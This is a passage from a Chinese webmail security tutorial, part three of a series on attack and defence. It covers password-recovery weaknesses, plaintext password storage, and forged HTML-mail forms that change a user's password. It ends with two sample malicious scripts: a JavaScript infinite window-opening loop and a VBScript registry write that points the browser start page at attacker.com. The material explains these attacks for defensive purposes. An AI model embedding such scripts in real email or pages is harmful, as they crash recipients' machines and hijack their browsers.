Webmail攻防實(shí)戰(zhàn)(3)_Mail服務(wù)器教程

      編輯Tag賺U幣
      教程Tag:暫無(wú)Tag,歡迎添加,賺取U幣!
      在用戶(hù)正確完成以上各步驟以后,WebMail系統(tǒng)就會(huì)讓用戶(hù)恢復(fù)自己郵箱帳戶(hù)的密碼。密碼恢復(fù)的方式又各有不同,一般有如下幾種方式,安全程度各有不同:

        1、頁(yè)面返回:返回的頁(yè)面里顯示用戶(hù)的郵箱密碼。這樣故然方便省事,但是如果讓攻擊者得到密碼,則能在絲毫不驚動(dòng)用戶(hù)的情況下使用用戶(hù)的郵箱,使得攻擊者能長(zhǎng)期監(jiān)視用戶(hù)的郵箱使用情況,給用戶(hù)帶來(lái)更大的安全隱患。

        2、郵件發(fā)送:將密碼發(fā)送到用戶(hù)注冊(cè)時(shí)登記的另一個(gè)郵箱里。對(duì)于攻擊者來(lái)說(shuō),忙了半天,仍然是一無(wú)所獲,除非繼續(xù)去攻擊另一個(gè)郵箱;對(duì)于用戶(hù)來(lái)說(shuō),在另一個(gè)郵箱里收到發(fā)來(lái)的密碼則是一個(gè)警告,說(shuō)明有攻擊者猜測(cè)到了他的郵箱密碼提示問(wèn)題,迫使用戶(hù)盡快改變自己的密碼提示問(wèn)題。

        不過(guò),如果用戶(hù)注冊(cè)時(shí)登記的不是一個(gè)正確的郵箱,或者該郵箱已經(jīng)失效,那么,這樣不僅是攻擊者,就是用戶(hù)本人也永遠(yuǎn)得不到密碼了。有些WebMail系統(tǒng)在注冊(cè)時(shí)要求用戶(hù)登記正確的郵件地址,并把郵箱開(kāi)通的驗(yàn)證信息發(fā)往該郵件地址,不過(guò)這樣仍然不能避免用戶(hù)在郵箱失效后不能恢復(fù)自己郵箱密碼的情況發(fā)生。

        3、密碼重設(shè):讓用戶(hù)重新設(shè)置一個(gè)密碼。這種方式相比“頁(yè)面返回”方式,在攻擊者重設(shè)密碼后,用戶(hù)因?yàn)椴荒苷5卿涍M(jìn)自己的郵箱而能察覺(jué)出受到攻擊,安全性相對(duì)好一些;但是相比“郵件發(fā)送”方式,因?yàn)楣粽吣芰⒓葱薷泥]箱密碼,少了一層保障,安全性又差一些。

        由“頁(yè)面返回”或“郵件發(fā)送”回來(lái)的密碼可以明顯看出,該電子郵件系統(tǒng)是把郵箱帳戶(hù)的密碼未經(jīng)加密直接以明文保存在數(shù)據(jù)庫(kù)或LDAP服務(wù)器中。這樣就造成很大的安全隱患,WebMail系統(tǒng)管理員或侵入數(shù)據(jù)庫(kù)的攻擊者能輕易獲取用戶(hù)的郵箱密碼,用戶(hù)卻完全不知情,所以為了加大保密性,有必要將郵箱密碼加密后再以密文存入數(shù)據(jù)庫(kù),最好用不可逆的單向加密算法,如md5等。

        郵箱密碼恢復(fù)機(jī)制是否安全,主要還是看WebMail系統(tǒng)提出什么樣的問(wèn)題、采取什么樣的問(wèn)答方式,例如將多個(gè)密碼恢復(fù)步驟中提出的問(wèn)題放在一步中一起提出,就會(huì)相應(yīng)地增加攻擊者的難度從而提高安全性,像搜狐郵件、新浪郵件和yahoo電郵等都是一些令人失望的例子。

        四、惡性HTML郵件

        電子郵件有兩種格式:純文本(txt)和超文本(html)。Html郵件由html語(yǔ)言寫(xiě)成,當(dāng)通過(guò)支持html的郵件客戶(hù)端或以瀏覽器登錄進(jìn)入WebMail查看時(shí),有字體、顏色、鏈接、圖像、聲音等等,給人以深刻的印象,許多垃圾廣告就是以html郵件格式發(fā)送的。

        利用html郵件,攻擊者能進(jìn)行電子郵件欺騙,甚至欺騙用戶(hù)更改自己的郵箱密碼。例如攻擊者通過(guò)分析WebMail密碼修改頁(yè)面的各表單元素,設(shè)計(jì)一個(gè)隱含有同樣表單的html頁(yè)面,預(yù)先給“新密碼”表單元素賦值,然后以html郵件發(fā)送給用戶(hù),欺騙用戶(hù)說(shuō)在頁(yè)面中提交某個(gè)表單或點(diǎn)擊某個(gè)鏈接就能打開(kāi)一個(gè)精彩網(wǎng)頁(yè),用戶(hù)照做后,在打開(kāi)“精彩網(wǎng)頁(yè)”的同時(shí),一個(gè)修改郵箱密碼的表單請(qǐng)求已經(jīng)發(fā)向WebMail系統(tǒng),而這一切,用戶(hù)完全不知情,直到下次不能登錄進(jìn)自己郵箱的時(shí)候。

        為了防止此類(lèi)的html郵件欺騙,在修改郵箱配置時(shí),特別是修改郵箱密碼和提示問(wèn)題時(shí),WebMail系統(tǒng)有必要讓用戶(hù)輸入舊密碼加以確認(rèn),這樣也能有效防止載取到當(dāng)前WebMail會(huì)話(huà)的攻擊者(下面會(huì)介紹)更改郵箱密碼。

        通過(guò)在html郵件中嵌入惡性腳本程序,攻擊者還能進(jìn)行很多破壞攻擊,如修改注冊(cè)表、非法操作文件、格式化硬盤(pán)、耗盡系統(tǒng)資源、修改“開(kāi)始”菜單等,甚至能刪除和發(fā)送用戶(hù)的郵件、訪(fǎng)問(wèn)用戶(hù)的地址簿、修改郵箱帳戶(hù)密碼等等。惡性腳本程序一般由JavaScript或VBScript腳本語(yǔ)言寫(xiě)成,內(nèi)嵌在html語(yǔ)言中,通過(guò)調(diào)用ActiveX控件或者結(jié)合WSH來(lái)達(dá)到破壞攻擊目的。深受修改瀏覽器的惡性html頁(yè)面之痛,飽經(jīng)“歡樂(lè)時(shí)光”郵件病毒之苦的朋友,對(duì)此應(yīng)該不會(huì)陌生。下面是兩個(gè)簡(jiǎn)單的惡性腳本程序:

        1、打開(kāi)無(wú)數(shù)個(gè)瀏覽器窗口,直至CPU超負(fù)荷,非關(guān)機(jī)不可:

      <script language="JavaScript">

      <!--
      while (true)
      {
      window.open("URI"); //如果URI就是當(dāng)前頁(yè)本身,那就更具破壞性。
      }
      //-->

      </script>

        2、修改注冊(cè)表:

      <script language="VBScript">
      Set RegWsh = CreateObject("WScript.Shell")
      '設(shè)置IE瀏覽器默認(rèn)頁(yè)
      RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com"
      </script>

      來(lái)源:網(wǎng)絡(luò)搜集//所屬分類(lèi):Mail服務(wù)器教程/更新時(shí)間:2011-12-08
      相關(guān)Mail服務(wù)器教程